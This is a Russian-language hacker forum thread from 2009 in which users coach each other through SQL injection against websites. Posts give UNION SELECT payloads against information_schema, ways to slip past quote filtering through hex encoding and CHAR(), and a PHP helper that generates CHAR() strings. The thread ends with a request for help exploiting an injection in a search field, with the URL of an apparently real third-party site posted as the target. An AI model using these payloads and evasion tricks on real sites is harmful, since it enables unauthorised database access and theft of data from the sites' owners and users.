27.12.2009, 19:36
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами:
8954306
Репутация:
1588
|
|
Сообщение от ILYAtirtir
Union+select+column_name+from+information_schema.c olumns+where+table_name='table'
вообще твои запросы покатит не везде
Код:
+where+table_name='table'
реал покатит перевести в Hex - кодировку
Код:
+where+table_name=0x7461626c65
где 0x7461626c65 = table
З.Ы. а еще можно попытать счастье угадывая поля 
|
|
|
27.12.2009, 19:31
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами:
8633638
Репутация:
0
|
|
Пробовал, тоже не получается, просто ошибка: You have an error in your SQL synta......
|
|
|
|
27.12.2009, 19:54
|
|
Новичок
Регистрация: 25.12.2009
Сообщений: 10
С нами:
8619984
Репутация:
30
|
|
Union+select+column_name+from+information_schema.c olumns+where+table_name='table'
скорее всего фильтруются кавычки, и на этот случай, специально для нас  разработчики придумали функцию CHAR(), которой необходимо передать ASCII код символа, или несколько ASCII кодов через запятую.
Допустим, запрос SELECT CHAR(117,115,101,114,115) вернет тебе users, кавычки при этом туда вбивать не надо.
PS. А вот тебе скриптик, чтобы автоматом генерить эту комбинацию.
PHP код:
<form action='' method='POST'>
<input type='text' name='ascii' />
<input type='submit' name='gogo' />
</form>
<hr/>
<?php
if($_POST['gogo'] && $_POST['ascii'] != ''){
for($i = 0; $i < strlen($_POST['ascii']); $i++){
$arr[] = substr($_POST['ascii'], $i, 1);
}
$str = 'char(';
foreach($arr as $k=>$v) {
if($k == count($arr) - 1){ $str .= ord($v).')'; break; }
$str .= ord($v).',';
}
echo $str;
}
?>
|
|
|
|
27.12.2009, 20:01
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
С нами:
10692266
Репутация:
3486
|
|
Сообщение от Ayowa
скорее всего фильтруются кавычки, и на этот случай, специально для нас разработчики придумали функцию CHAR(), которой необходимо передать ASCII код символа, или несколько ASCII кодов через запятую.
Допустим, запрос SELECT CHAR(117,115,101,114,115) вернет тебе users, кавычки при этом туда вбивать не надо.
PS. А вот тебе скриптик, чтобы автоматом генерить эту комбинацию.
PHP код:
<form action='' method='POST'>
<input type='text' name='ascii' />
<input type='submit' name='gogo' />
</form>
<hr/>
<?php
if($_POST['gogo'] && $_POST['ascii'] != ''){
for($i = 0; $i < strlen($_POST['ascii']); $i++){
$arr[] = substr($_POST['ascii'], $i, 1);
}
$str = 'char(';
foreach($arr as $k=>$v) {
if($k == count($arr) - 1){ $str .= ord($v).')'; break; }
$str .= ord($v).',';
}
echo $str;
}
?>
И вместо всего этого понта-поста достаточно было написать
PHP код:
<?php echo '0x'.bin2hex($_GET);?>
|
|
|
|
27.12.2009, 19:35
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
на ковычки ругаеться скорей всего (в тексте ошибки точней сказано), пробуй talbe перевести в char
|
|
|
|
27.12.2009, 20:05
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
С нами:
8633638
Репутация:
0
|
|
Все. разобрался, всем большое спасибо!
|
|
|
|
27.12.2009, 20:37
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
С нами:
9680718
Репутация:
118
|
|
Ну если нет пинга -> трафика -> ICMP пакетов, значит нет ответа от сервера?
Или я не так понял...?
Допустим у firewall ( outpost ) есть режим анонимности, когда он блокирует ICMP трафик, инет же работает))
Ты же не собираешься отправлять пакеты через ICMP туннель)
|
|
|
|
27.12.2009, 21:32
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
Сообщение от shellz[21h]
Допустим у firewall ( outpost ) есть режим анонимности, когда он блокирует ICMP трафик, инет же работает))
Ты же не собираешься отправлять пакеты через ICMP туннель)
я уже разобрался )
---------
Как раскрутить sql-inj в поле для поиска, просто первый раз сталкиваюсь с этой проблемой 
|
|
|
|
27.12.2009, 21:34
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от SeNaP
я уже разобрался )
---------
Как раскрутить sql-inj в поле для поиска, просто первый раз сталкиваюсь с этой проблемой Все зависит от запроса. Ссылку в студию.
|
|
|
|
27.12.2009, 21:47
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами:
9347610
Репутация:
165
|
|
http://java.vg/index.php?id=0&ac=search
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1784964){kind=avatar}
![Аватар для shellz[21h]](/avatars/avatar46780.jpg?1785084){kind=avatar}
Похожие темы
Комбинированный вид
